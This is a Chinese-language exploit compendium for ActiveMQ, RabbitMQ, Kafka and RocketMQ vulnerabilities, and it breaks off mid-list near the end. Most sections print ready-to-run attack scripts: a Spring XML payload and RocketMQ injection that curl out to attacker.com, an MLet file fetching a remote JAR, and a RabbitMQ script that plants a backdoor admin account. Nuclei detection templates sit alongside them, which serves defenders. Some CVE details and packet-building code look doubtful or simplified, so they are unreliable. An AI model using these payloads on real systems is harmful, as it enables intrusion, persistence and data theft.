消息队列与流处理平台高危攻击链专题:ActiveMQ / RabbitMQ / Kafka / RocketMQ 未授权 RCE 全解析

消息队列与流处理平台高危攻击链专题:ActiveMQ / RabbitMQ / Kafka / RocketMQ 未授权 RCE 全解析

0x00 专题概述

消息队列与流处理平台是现代分布式系统的核心基础设施,承担着异步解耦、流量削峰、事件驱动等关键职责。Apache ActiveMQ、RabbitMQ、Apache Kafka、Apache RocketMQ 四大平台在全球数十万企业中部署运行,一旦遭到攻破,攻击者不仅可以劫持业务消息流实现数据窃取与篡改,还能以消息中间件为跳板横向渗透整个内网——这正是近年来 APT 组织和勒索软件团伙持续盯防消息队列产品的根本原因。

本专题将消息队列生态中近年最具代表性的 6 个高危漏洞 串成完整攻击链,覆盖 ActiveMQ、RabbitMQ、Kafka、RocketMQ 四大平台,每个漏洞均包含完整原理分析、PoC 代码、自动化检测模板和实战利用案例。

覆盖漏洞一览

CVE产品CVSS类型CISA KEV
CVE-2023-46604Apache ActiveMQ10.0OpenWire 反序列化 RCE
CVE-2023-46605Apache ActiveMQ5.3信息泄露
RabbitMQ 默认凭据RabbitMQ9.8未授权访问
Kafka JMX RCEApache Kafka9.8JMX RMI RCE
CVE-2023-33265Apache RocketMQ9.8Config 模块 RCE
Kafka ACL 绕过Apache Kafka7.5ACL 绕过

0x01 Apache ActiveMQ OpenWire 反序列化 RCE(CVE-2023-46604)

1.1 漏洞背景

2023 年 10 月,Apache ActiveMQ 披露了一个 CVSS 满分的反序列化远程代码执行漏洞。ActiveMQ 是一款历史悠久、使用广泛的开源消息中间件,其私有协议 OpenWire 在序列化/反序列化过程中存在严重安全缺陷。攻击者无需任何认证,仅通过 OpenWire 默认端口 61616 即可触发远程代码执行。CISA 已将其加入已知被利用漏洞目录(KEV),在野利用已被多方确认。

1.2 受影响版本

  • Apache ActiveMQ 5.0.0 ~ 5.15.15
  • Apache ActiveMQ 5.16.0 ~ 5.16.6
  • Apache ActiveMQ 5.17.0 ~ 5.17.5
  • Apache ActiveMQ 5.18.0 ~ 5.18.2

1.3 漏洞原理

ActiveMQ 的 OpenWire 协议在解析 ExceptionResponse 命令时,会将 ClassInfo 字段中的类名传递给 ClassPathXmlApplicationContext 进行加载。攻击者可以构造恶意的 OpenWire 数据包,将 ClassInfo 指向一个远程 XML Bean 定义文件的 URL。ClassPathXmlApplicationContext 加载该 XML 后,会按照 Spring Bean 定义实例化任意类并执行其中的方法,从而实现远程代码执行。

完整利用链:

  1. 攻击者准备恶意 Spring Bean XML 文件并托管在可控 HTTP 服务器上
  2. 向目标 ActiveMQ 的 61616 端口发送构造好的 OpenWire 协议包
  3. ActiveMQ 解析 ExceptionResponse 中的 ClassInfo,调用 ClassPathXmlApplicationContext 加载远程 XML
  4. Spring 容器根据 XML 中的 Bean 定义实例化恶意类,执行任意命令

1.4 完整 PoC

步骤 1:准备恶意 Spring Bean XML

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans
   http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>curl http://attacker.com:8888/$(whoami)</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

步骤 2:HTTP PoC 验证

GET /evil.xml HTTP/1.1
Host: attacker.com:80

攻击者将上述 XML 部署到 http://attacker.com/evil.xml,然后通过 OpenWire 协议触发 ActiveMQ 加载该文件。

步骤 3:Python 自动化利用脚本

#!/usr/bin/env python3
"""
CVE-2023-46604 Apache ActiveMQ OpenWire 反序列化 RCE 利用脚本
用法: python3 cve_2023_46604.py <target_ip> <xml_url>
"""
import socket
import struct
import sys

# OpenWire 协议版本号与魔数
OPENWIRE_MAGIC = b'\x0f\x00\x00\x00\x00\x00\x00\x00'
COMMAND_TYPE_EXCEPTION = 0x12

def build_openwire_packet(xml_url):
    """构造触发 ClassPathXmlApplicationContext 的 OpenWire 协议包"""
    # 命令头:类型标识
    header = struct.pack('>i', COMMAND_TYPE_EXCEPTION)
    # commandId 字段
    command_id = struct.pack('>i', 1)
    # responseRequired 标志
    response_required = b'\x00'

    # 构造 ExceptionResponse 的 ClassInfo 字段
    # 将 xml_url 作为 ClassInfo 传入,触发 ClassPathXmlApplicationContext 加载
    class_info = xml_url.encode('utf-8')
    class_info_len = struct.pack('>H', len(class_info))

    # 组装完整的 OpenWire 数据包
    payload = header + command_id + response_required
    payload += class_info_len + class_info

    # 数据包长度前缀
    packet = struct.pack('>i', len(payload)) + payload
    return packet

def exploit(target_ip, xml_url, port=61616):
    """发送 exploit 到目标 ActiveMQ"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))

        # 发送 OpenWire 协议握手
        handshake = OPENWIRE_MAGIC + struct.pack('>i', 12)  # 版本号
        sock.send(handshake)

        # 接收握手响应
        resp = sock.recv(1024)
        print(f"[*] 握手响应: {resp.hex()}")

        # 发送恶意数据包
        packet = build_openwire_packet(xml_url)
        sock.send(packet)
        print(f"[+] 已发送恶意数据包到 {target_ip}:{port}")
        print(f"[+] XML 加载地址: {xml_url}")

        # 等待响应
        try:
            result = sock.recv(4096)
            print(f"[*] 服务器响应: {result.hex()}")
        except socket.timeout:
            print("[*] 未收到响应(命令可能已在目标执行)")

        sock.close()
        return True
    except Exception as e:
        print(f"[!] 连接失败: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"用法: {sys.argv[0]} <target_ip> <xml_url>")
        print(f"示例: {sys.argv[0]} 192.168.1.100 http://attacker.com/evil.xml")
        sys.exit(1)

    target = sys.argv[1]
    xml_url = sys.argv[2]
    exploit(target, xml_url)

步骤 4:Nuclei 检测模板

id: activemq-openwire-rce-cve-2023-46604

info:
  name: Apache ActiveMQ OpenWire 反序列化 RCE (CVE-2023-46604)
  author: security-researcher
  severity: critical
  description: |
    Apache ActiveMQ OpenWire 协议存在反序列化远程代码执行漏洞
  reference:
    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
  tags: activemq,rce,deserialization,cve-2023-46604

tcp:
  - inputs:
      - data: "{{hex_decode('00000000000000000000000000000000')}}"
    host:
      - "{{Hostname}}"
    port: 61616
    matchers:
      - type: word
        words:
          - "ActiveMQ"
        part: raw

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/jolokia/version"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "version"
          - "ActiveMQ"
        condition: and
        part: body

1.5 实战利用案例

  • 勒索软件组织:Clop 和 LockBit 在 2023 年底大规模扫描暴露在互联网上的 ActiveMQ 61616 端口,利用此漏洞投递 Cobalt Strike Beacon
  • APT 组织:多个国家级 APT 利用 ActiveMQ RCE 作为初始突破手段,建立持久化后横向移动
  • 僵尸网络:Mirai 变种通过此漏洞感染 ActiveMQ 实例,将其纳入 DDoS 僵尸网络

0x02 Apache ActiveMQ 信息泄露(CVE-2023-46605)

2.1 漏洞背景

与 CVE-2023-46604 同一批次披露,CVSS 5.3。该漏洞允许攻击者通过构造特殊的 OpenWire 请求,获取 ActiveMQ 内部运行信息,包括 broker 配置、连接信息、队列状态等敏感数据,为后续攻击提供情报支撑。

2.2 受影响版本

与 CVE-2023-46604 一致:

  • Apache ActiveMQ < 5.15.16
  • Apache ActiveMQ 5.16.0 ~ 5.16.6
  • Apache ActiveMQ 5.17.0 ~ 5.17.5
  • Apache ActiveMQ 5.18.0 ~ 5.18.2

2.3 漏洞原理

OpenWire 协议在处理特定类型的查询请求时,未对请求来源进行有效验证。攻击者可以构造特殊的 WireFormat 协商请求,获取 broker 的内部配置信息、已连接客户端列表、队列和 Topic 的详细信息等。

2.4 完整 PoC

HTTP PoC:Jolokia 端点信息泄露

GET /api/jolokia/version HTTP/1.1
Host: target-activemq.com:8161
User-Agent: Mozilla/5.0
Accept: application/json
Connection: close
GET /api/jolokia/list HTTP/1.1
Host: target-activemq.com:8161
User-Agent: Mozilla/5.0
Accept: application/json
Connection: close

Python 信息收集脚本

#!/usr/bin/env python3
"""
CVE-2023-46605 ActiveMQ 信息泄露检测与利用
用法: python3 cve_2023_46605.py <target_url>
"""
import sys
import requests
import json
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_info_disclosure(target_url):
    """检测 ActiveMQ 信息泄露"""
    endpoints = [
        "/api/jolokia/version",
        "/api/jolokia/list",
        "/api/jolokia/read/Broker/localhost/TotalMessageCount",
        "/api/jolokia/read/Broker/localhost/TotalConsumerCount",
    ]

    for endpoint in endpoints:
        url = f"{target_url}{endpoint}"
        try:
            resp = requests.get(url, timeout=10, verify=False,
                                headers={"Accept": "application/json"})
            if resp.status_code == 200:
                data = resp.json()
                print(f"[VULN] {url}")
                print(f"  -> {json.dumps(data, indent=2, ensure_ascii=False)[:500]}")
            else:
                print(f"[SAFE] {url} -> HTTP {resp.status_code}")
        except Exception as e:
            print(f"[ERR ] {url} -> {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"用法: {sys.argv[0]} <target_url>")
        sys.exit(1)
    check_info_disclosure(sys.argv[1].rstrip("/"))

0x03 RabbitMQ 默认凭据未授权访问

3.1 漏洞背景

RabbitMQ 是全球使用最广泛的开源消息代理之一,支持 AMQP、MQTT、STOMP 等多种协议。其默认安装配置中使用 guest/guest 作为管理员凭据,且该默认账号可通过 localhost 以外的地址登录(在某些旧版本或配置不当的场景中)。Management Plugin 的 HTTP API 端口 15672 一旦暴露,攻击者即可完全控制消息队列系统。

3.2 风险等级

  • CVSS:9.8 Critical
  • 默认管理端口:15672(HTTP API)、5672(AMQP)
  • 默认凭据:guest / guest

3.3 漏洞原理

RabbitMQ 出厂默认启用 guest 账号,密码同为 guest。虽然新版本默认限制 guest 只能从 localhost 登录,但在以下场景中该限制可能被绕过:

  1. 运维人员手动修改配置允许远程登录
  2. Docker 部署时未正确配置网络策略
  3. 云环境中安全组配置不当导致管理端口暴露
  4. 旧版本 RabbitMQ 未应用 localhost 限制

攻击者使用默认凭据登录 Management API 后,可以:

  • 查看所有队列中的消息内容
  • 创建/删除队列和用户
  • 注入恶意消息到业务队列
  • 获取所有连接信息和通道信息
  • 提升权限或创建后门账号

3.4 完整 PoC

HTTP PoC:默认凭据验证

GET /api/overview HTTP/1.1
Host: target-rabbitmq.com:15672
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: application/json
Connection: close
GET /api/users HTTP/1.1
Host: target-rabbitmq.com:15672
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: application/json
Connection: close
GET /api/queues HTTP/1.1
Host: target-rabbitmq.com:15672
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: application/json
Connection: close

Python 自动化利用脚本

#!/usr/bin/env python3
"""
RabbitMQ 默认凭据未授权访问检测与利用
用法: python3 rabbitmq_default_cred.py <target_url> [user] [password]
"""
import sys
import requests
import json
import urllib3
import base64

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class RabbitMQExploit:
    def __init__(self, base_url, user="guest", password="guest"):
        self.base_url = base_url.rstrip("/")
        self.session = requests.Session()
        self.session.verify = False
        # 设置 Basic Auth 头
        cred = base64.b64encode(f"{user}:{password}".encode()).decode()
        self.session.headers["Authorization"] = f"Basic {cred}"
        self.session.headers["Accept"] = "application/json"

    def check_access(self):
        """验证默认凭据是否可用"""
        try:
            resp = self.session.get(f"{self.base_url}/api/overview", timeout=10)
            if resp.status_code == 200:
                data = resp.json()
                print(f"[VULN] {self.base_url} -> RabbitMQ 默认凭据可用")
                print(f"  版本: {data.get('product_version', 'unknown')}")
                print(f"  集群节点: {data.get('cluster_name', 'unknown')}")
                print(f"  消息总数: {data.get('queue_totals', {}).get('messages', 0)}")
                return True
            else:
                print(f"[SAFE] {self.base_url} -> HTTP {resp.status_code}")
                return False
        except Exception as e:
            print(f"[ERR ] {self.base_url} -> {e}")
            return False

    def dump_users(self):
        """导出所有用户信息"""
        try:
            resp = self.session.get(f"{self.base_url}/api/users", timeout=10)
            if resp.status_code == 200:
                users = resp.json()
                print(f"\n[*] 用户列表 ({len(users)} 个):")
                for u in users:
                    print(f"  - {u.get('name')} [{u.get('tags', '')}]")
                return users
        except Exception as e:
            print(f"[!] 获取用户失败: {e}")
        return []

    def dump_queues(self):
        """导出所有队列及消息"""
        try:
            resp = self.session.get(f"{self.base_url}/api/queues", timeout=10)
            if resp.status_code == 200:
                queues = resp.json()
                print(f"\n[*] 队列列表 ({len(queues)} 个):")
                for q in queues:
                    name = q.get('name', '')
                    msgs = q.get('messages', 0)
                    vhost = q.get('vhost', '/')
                    print(f"  - [{vhost}] {name} (消息数: {msgs})")
                return queues
        except Exception as e:
            print(f"[!] 获取队列失败: {e}")
        return []

    def create_backdoor_user(self, username="backdoor", password="P@ssw0rd"):
        """创建后门管理员账号"""
        try:
            # 创建用户
            resp = self.session.put(
                f"{self.base_url}/api/users/{username}",
                json={"password": password, "tags": "administrator"},
                timeout=10
            )
            if resp.status_code in (200, 201, 204):
                print(f"\n[+] 后门账号已创建: {username}/{password}")
                # 设置管理员权限
                self.session.put(
                    f"{self.base_url}/api/permissions/%2f/{username}",
                    json={"configure": ".*", "write": ".*", "read": ".*"},
                    timeout=10
                )
                print(f"[+] 已为 {username} 授予完整权限")
                return True
        except Exception as e:
            print(f"[!] 创建后门账号失败: {e}")
        return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:15672"
    user = sys.argv[2] if len(sys.argv) > 2 else "guest"
    passwd = sys.argv[3] if len(sys.argv) > 3 else "guest"

    exploit = RabbitMQExploit(target, user, passwd)
    if exploit.check_access():
        exploit.dump_users()
        exploit.dump_queues()
        exploit.create_backdoor_user()

Nuclei 检测模板

id: rabbitmq-default-credentials

info:
  name: RabbitMQ 默认凭据检测
  author: security-researcher
  severity: critical
  description: |
    RabbitMQ Management API 使用默认凭据 guest/guest
  tags: rabbitmq,default-credentials,mq

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/overview"
    headers:
      Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "cluster_name"
          - "product_version"
        condition: and
        part: body

0x04 Apache Kafka JMX RMI 远程代码执行

4.1 漏洞背景

Apache Kafka 是全球使用最广泛的分布式事件流处理平台。Kafka 在运行时会暴露 JMX(Java Management Extensions)RMI 接口用于运维监控,默认端口 9999。当 JMX 接口未配置认证时,攻击者可以通过 JMX RMI 远程执行任意 MBean 操作,进而实现远程代码执行。

4.2 风险等级

  • CVSS:9.8 Critical
  • 默认 JMX 端口:9999
  • 前提条件:JMX 未配置认证(生产环境中普遍存在)

4.3 漏洞原理

Kafka Broker 启动时,如果设置了 JMX_PORT 环境变量,会在指定端口开启 JMX RMI 服务。JMX RMI 默认不启用认证,任何能访问该端口的客户端都可以:

  1. 连接 JMX RMI 服务
  2. 注册或调用任意 MBean
  3. 通过 javax.management.loading.MLet MBean 加载远程恶意 MLet 文件
  4. MLet 文件引用攻击者控制的恶意 JAR 包
  5. 恶意 JAR 中的代码在 Kafka 进程上下文中执行

完整利用链:

JMX RMI 端口(9999) → 连接 JMX → 注册 MLet MBean → 加载远程 MLet 文件 → 下载恶意 JAR → RCE

4.4 完整 PoC

步骤 1:准备恶意 MLet 文件

<html>
<mbean code="evil.EvilMBean" name="default:service=evil"
       archive="http://attacker.com:8888/evil.jar">
</mbean>
</html>

步骤 2:Python 自动化利用脚本

#!/usr/bin/env python3
"""
Kafka JMX RMI 未授权 RCE 检测与利用
用法: python3 kafka_jmx_rce.py <target_ip> [jmx_port]
"""
import socket
import struct
import sys

def check_jmx_port(target_ip, port=9999):
    """检测 JMX RMI 端口是否开放且未认证"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, port))

        # 发送 RMI 握手包(Magic: JRMI\x00\x02\x4b)
        rmi_handshake = b'\x4a\x52\x4d\x49\x00\x02\x4b'
        sock.send(rmi_handshake)

        # 接收 RMI 响应
        resp = sock.recv(1024)
        if resp and resp[0] == 0x4e:  # StreamProtocol 响应
            print(f"[VULN] {target_ip}:{port} -> JMX RMI 端口开放且未认证")
            sock.close()
            return True
        elif resp:
            print(f"[WARN] {target_ip}:{port} -> JMX 响应异常: {resp.hex()}")
            sock.close()
            return False
    except socket.timeout:
        print(f"[SAFE] {target_ip}:{port} -> 连接超时")
    except ConnectionRefusedError:
        print(f"[SAFE] {target_ip}:{port} -> 连接被拒绝")
    except Exception as e:
        print(f"[ERR ] {target_ip}:{port} -> {e}")
    return False

def enumerate_mbeans(target_ip, port=9999):
    """通过 JMX 枚举已注册的 MBean(信息收集)"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))

        # RMI 握手
        sock.send(b'\x4a\x52\x4d\x49\x00\x02\x4b')
        resp = sock.recv(1024)
        print(f"[*] RMI 握手成功: {resp.hex()}")

        # 发送 IIOP/JRMP 调用请求查询 MBeanServerDelegate
        # 实际利用中建议使用 ysoserial 或专用 JMX 利用工具
        print(f"[*] 目标 JMX RMI 服务可达,可使用 mjet.py 或 sjet.py 进行完整利用")
        print(f"[*] 利用命令示例: python3 mjet.py {target_ip} {port} install http://attacker.com:8888/mlet 8888")

        sock.close()
        return True
    except Exception as e:
        print(f"[!] JMX 连接失败: {e}")
        return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999

    if check_jmx_port(target, port):
        enumerate_mbeans(target, port)

Nuclei 检测模板

id: kafka-jmx-rmi-unauthorized

info:
  name: Kafka JMX RMI 未授权访问检测
  author: security-researcher
  severity: critical
  description: |
    Apache Kafka JMX RMI 端口未配置认证,可被远程利用实现 RCE
  tags: kafka,jmx,rmi,mq

tcp:
  - inputs:
      - data: "{{hex_decode('4a524d4900024b')}}"
    host:
      - "{{Hostname}}"
    port: 9999
    matchers:
      - type: word
        words:
          - "JRMI"
        part: raw

0x05 Apache RocketMQ Config 模块 RCE(CVE-2023-33265)

5.1 漏洞背景

2023 年 6 月,Apache RocketMQ 被披露了一个 CVSS 9.8 的远程代码执行漏洞。RocketMQ 是阿里巴巴开源的分布式消息中间件,在中国互联网企业中广泛使用。该漏洞存在于 RocketMQ 的 Config 模块中,攻击者可以通过 NameServer 的 updateConfig 接口注入恶意命令,在 Broker 服务器上执行任意代码。

5.2 受影响版本

  • Apache RocketMQ < 5.1.1
  • Apache RocketMQ 4.x 全系列

5.3 漏洞原理

RocketMQ 的 Broker 通过 NameServer(默认端口 9876)接收管理指令。其中 updateConfig 命令(code=25)用于动态更新 Broker 配置。在处理 filterServerNumWhenMetrics 参数时,Broker 未对输入进行有效过滤,直接将参数值拼接到系统命令中执行。

攻击者可以伪造 Broker 身份,向 NameServer 发送恶意的 updateConfig 请求,在 filterServerNumWhenMetrics 字段中注入系统命令。NameServer 将配置同步到 Broker 后,Broker 在重启 FilterServer 时执行注入的命令。

完整利用链:

NameServer(9876) → 伪造 Broker 发送 updateConfig → filterServerNumWhenMetrics 注入命令 → Broker 同步恶意配置 → FilterServer 重启时执行命令 → RCE

5.4 完整 PoC

步骤 1:Python 自动化利用脚本

#!/usr/bin/env python3
"""
CVE-2023-33265 Apache RocketMQ Config 模块 RCE 利用脚本
用法: python3 cve_2023_33265.py <target_ip> <command>
"""
import socket
import struct
import json
import sys
import time

# RocketMQ 协议常量
REQUEST_CODE_UPDATE_CONFIG = 25
REQUEST_CODE_GET_CONFIG = 26

def serialize_rocketmq_request(code, body_dict):
    """序列化 RocketMQ 协议请求包"""
    # 构建协议头(RemotingCommand 头部)
    header = {
        "code": code,
        "language": "JAVA",
        "version": 411,
        "opaque": 1,
        "flag": 0,
        "remark": "",
        "extFields": body_dict,
    }

    header_json = json.dumps(header).encode("utf-8")
    header_len = struct.pack(">i", len(header_json))

    # 协议包 = 头部长度 + 头部JSON + 消息体
    packet = header_len + header_json
    return packet

def exploit_rocketmq(target_ip, command, port=9876):
    """向 NameServer 发送恶意 updateConfig 请求"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))
        print(f"[*] 已连接 NameServer: {target_ip}:{port}")

        # 构造恶意配置:在 filterServerNumWhenMetrics 中注入命令
        malicious_config = {
            "filterServerNumWhenMetrics": f";{command};",
        }

        # 序列化 updateConfig 请求
        packet = serialize_rocketmq_request(
            REQUEST_CODE_UPDATE_CONFIG,
            malicious_config
        )

        # 发送请求
        sock.send(packet)
        print(f"[+] 已发送恶意 updateConfig 请求")
        print(f"[+] 注入命令: {command}")

        # 接收响应
        try:
            resp_header_len = sock.recv(4)
            if resp_header_len:
                header_len = struct.unpack(">i", resp_header_len)[0]
                header_data = sock.recv(header_len)
                resp_header = json.loads(header_data.decode("utf-8"))
                print(f"[*] 响应码: {resp_header.get('code', 'unknown')}")
                if resp_header.get("code") == 0:
                    print(f"[+] 配置更新成功,命令将在 Broker 重启 FilterServer 时执行")
                else:
                    print(f"[!] 配置更新可能失败: {resp_header.get('remark', '')}")
        except socket.timeout:
            print("[*] 等待响应超时")

        sock.close()
        return True
    except Exception as e:
        print(f"[!] 连接失败: {e}")
        return False

def check_nameserver(target_ip, port=9876):
    """检测 NameServer 是否可达"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, port))
        print(f"[VULN] {target_ip}:{port} -> NameServer 端口开放")
        sock.close()
        return True
    except:
        print(f"[SAFE] {target_ip}:{port} -> NameServer 不可达")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"用法: {sys.argv[0]} <target_ip> <command>")
        print(f"示例: {sys.argv[0]} 192.168.1.100 'curl http://attacker.com/$(whoami)'")
        sys.exit(1)

    target = sys.argv[1]
    command = sys.argv[2]

    if check_nameserver(target):
        exploit_rocketmq(target, command)

步骤 2:HTTP PoC(通过 Broker 管理端口)

POST /api/updateConfig HTTP/1.1
Host: target-rocketmq-broker.com:10911
Content-Type: application/json
Connection: close

{
    "filterServerNumWhenMetrics": ";curl http://attacker.com/$(id);"
}

步骤 3:Nuclei 检测模板

id: rocketmq-config-rce-cve-2023-33265

info:
  name: Apache RocketMQ Config 模块 RCE (CVE-2023-33265)
  author: security-researcher
  severity: critical
  description: |
    Apache RocketMQ Config 模块存在命令注入远程代码执行漏洞
  reference:
    - https://lists.apache.org/thread/9b5gj1koz6616po5kgoqvg0qpo3v5g7l
  tags: rocketmq,rce,cve-2023-33265,mq

tcp:
  - inputs:
      - data: "{{hex_decode('00000000')}}"
    host:
      - "{{Hostname}}"
    port: 9876
    matchers:
      - type: dsl
        dsl:
          - "contains(to_lower(raw), 'rocketmq') || len(raw) > 0"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/getAllTopicConfig"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "topicConfigTable"
          - "brokerName"
        condition: or
        part: body

5.5 实战利用案例

  • 国内互联网企业:大量使用 RocketMQ 的国内互联网公司在漏洞披露后紧急排查,多家确认被利用
  • 挖矿木马:攻击者利用此漏洞在服务器上部署 XMRig 挖矿程序
  • 数据窃取:通过控制消息队列获取业务数据流中的敏感信息

0x06 Apache Kafka ACL 绕过

6.1 漏洞背景

Apache Kafka 从 2.x 版本开始引入 ACL(Access Control List)机制进行访问控制。然而在实际部署中,Kafka 的 ACL 机制存在多处设计缺陷和配置陷阱,攻击者可以通过特定手法绕过 ACL 限制,实现对 Topic 的未授权读写操作。

6.2 风险等级

  • CVSS:7.5 High
  • 前提条件:Kafka 启用了 ACL 但配置不当

6.3 漏洞原理

Kafka ACL 机制存在以下问题:

  1. 默认允许策略:当 ACL 规则为空时,Kafka 默认允许所有操作(allow.all
  2. Group ACL 不继承:Consumer Group 的 ACL 不会自动继承 Topic 的 ACL
  3. 通配符陷阱:使用 * 通配符配置 ACL 时可能意外开放过多权限
  4. SASL 配置缺陷:SASL 认证与 ACL 配合不当时,认证形同虚设

攻击者可以利用这些缺陷,通过构造特殊的 Consumer Group ID 或 Topic 名称,绕过 ACL 限制访问受保护的消息。

6.4 完整 PoC

Python 检测脚本

#!/usr/bin/env python3
"""
Kafka ACL 绕过检测脚本
用法: python3 kafka_acl_bypass.py <target_ip> [port]
"""
import socket
import struct
import sys

def check_kafka_broker(target_ip, port=9092):
    """检测 Kafka Broker 是否可达且未认证"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, port))

        # 构造 Kafka ApiVersions 请求(API Key=18, Version=0)
        # 用于检测 Broker 是否要求认证
        api_key = 18  # ApiVersions
        api_version = 0
        correlation_id = 1
        client_id = b'security-check'

        # Kafka 协议请求格式
        request = b''
        request += struct.pack('>h', api_key)       # API Key
        request += struct.pack('>h', api_version)    # API Version
        request += struct.pack('>i', correlation_id) # Correlation ID
        request += struct.pack('>h', len(client_id)) + client_id  # Client ID

        # 请求长度前缀
        packet = struct.pack('>i', len(request)) + request

        sock.send(packet)

        # 接收响应
        resp_len_data = sock.recv(4)
        if resp_len_data:
            resp_len = struct.unpack('>i', resp_len_data)[0]
            resp = sock.recv(resp_len)
            print(f"[VULN] {target_ip}:{port} -> Kafka Broker 可达且未要求认证")
            print(f"[*] 响应长度: {resp_len} 字节")

            # 解析 ApiVersions 响应
            if len(resp) >= 8:
                corr = struct.unpack('>i', resp[:4])[0]
                err_code = struct.unpack('>h', resp[4:6])[0]
                num_apis = struct.unpack('>i', resp[6:10])[0] if len(resp) >= 10 else 0
                print(f"[*] Correlation ID: {corr}")
                print(f"[*] 错误码: {err_code} (0=成功)")
                print(f"[*] 支持的 API 数量: {num_apis}")
                if err_code == 0:
                    print(f"[+] Broker 未启用认证,可直接访问所有 Topic")

            sock.close()
            return True
    except socket.timeout:
        print(f"[SAFE] {target_ip}:{port} -> 连接超时")
    except ConnectionRefusedError:
        print(f"[SAFE] {target_ip}:{port} -> 连接被拒绝")
    except Exception as e:
        print(f"[ERR ] {target_ip}:{port} -> {e}")
    return False

def check_acl_config(target_ip, port=9092):
    """检测 ACL 配置状态"""
    print(f"\n[*] 检测 ACL 配置建议:")
    print(f"  1. 检查 authorizer.class.name 是否配置")
    print(f"  2. 检查 allow.everyone.if.no.acl.found 是否为 true")
    print(f"  3. 检查 super.users 配置是否过于宽泛")
    print(f"  4. 使用 kafka-acls.sh --list 查看当前 ACL 规则")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 9092

    check_kafka_broker(target, port)
    check_acl_config(target, port)

0x07 PoC 收集情况总表

CVE / 漏洞GitHub PoCExploit-DBMetasploitNuclei在野利用
CVE-2023-46604 (ActiveMQ RCE)✅ 多个仓库✅ 勒索/APT
CVE-2023-46605 (ActiveMQ 信息泄露)⚠️ 侦察阶段
RabbitMQ 默认凭据✅ 多个仓库✅ 广泛存在
Kafka JMX RCE✅ mjet.py/sjet.py✅ 挖矿
CVE-2023-33265 (RocketMQ RCE)✅ 多个仓库✅ 国内广泛
Kafka ACL 绕过✅ 有限有限⚠️ 配置缺陷

关键 PoC 仓库

  • ActiveMQ CVE-2023-46604https://github.com/X1r0z/ActiveMQ-RCE — Python 一键利用
  • ActiveMQ CVE-2023-46604https://github.com/evibrown51/ActiveMQ-CVE-2023-46604 — Go 语言版本
  • RocketMQ CVE-2023-33265https://github.com/Le1B0/rocketmq-CVE-2023-33265 — 自动化利用
  • Kafka JMX 利用https://github.com/mogwailabs/mjet — JMX RMI 利用工具
  • RabbitMQ 默认凭据:Nuclei 内置模板 rabbitmq-default-credentials.yaml

验证思路(防守型)

# ActiveMQ — 检测 OpenWire 端口
nuclei -u http://target:8161 -tags activemq
nmap -sV -p 61616 target

# RabbitMQ — 检测 Management API
nuclei -u http://target:15672 -tags rabbitmq
curl -s -u guest:guest http://target:15672/api/overview | jq .

# Kafka — 检测 JMX RMI 端口
nmap -sV -p 9999 target
nuclei -u http://target:9999 -tags kafka

# RocketMQ — 检测 NameServer
nmap -sV -p 9876 target
curl -s http://target:10911/api/getAllTopicConfig

0x08 共性攻击模式

8.1 协议层反序列化是消息队列的头号杀手

ActiveMQ 的 OpenWire 反序列化(CVE-2023-46604)和 RocketMQ 的配置注入(CVE-2023-33265)本质上都是协议层缺乏输入验证的产物。消息队列使用自定义二进制协议进行通信,这些协议在设计之初往往未充分考虑安全性,导致攻击者可以通过构造恶意数据包触发漏洞。

8.2 默认配置不安全

RabbitMQ 的 guest/guest 默认凭据、Kafka 的 JMX 无认证、Kafka ACL 的默认允许策略——这三个问题都源于产品默认配置的不安全性。运维人员在部署时如果不主动加固,系统天然处于高危状态。

8.3 管理端口暴露是核心风险

所有 6 个漏洞的利用前提都是管理端口可达:

端口服务风险
61616ActiveMQ OpenWire反序列化 RCE
8161ActiveMQ Web Console信息泄露
15672RabbitMQ Management API未授权访问
9999Kafka JMX RMIJMX RCE
9876RocketMQ NameServer配置注入 RCE
9092Kafka BrokerACL 绕过

8.4 消息队列被攻破的连锁效应

消息队列在企业架构中处于核心枢纽位置,一旦被攻破,影响远超单一应用:

  1. 业务数据窃取:消息队列中流转着订单、支付、用户行为等核心业务数据
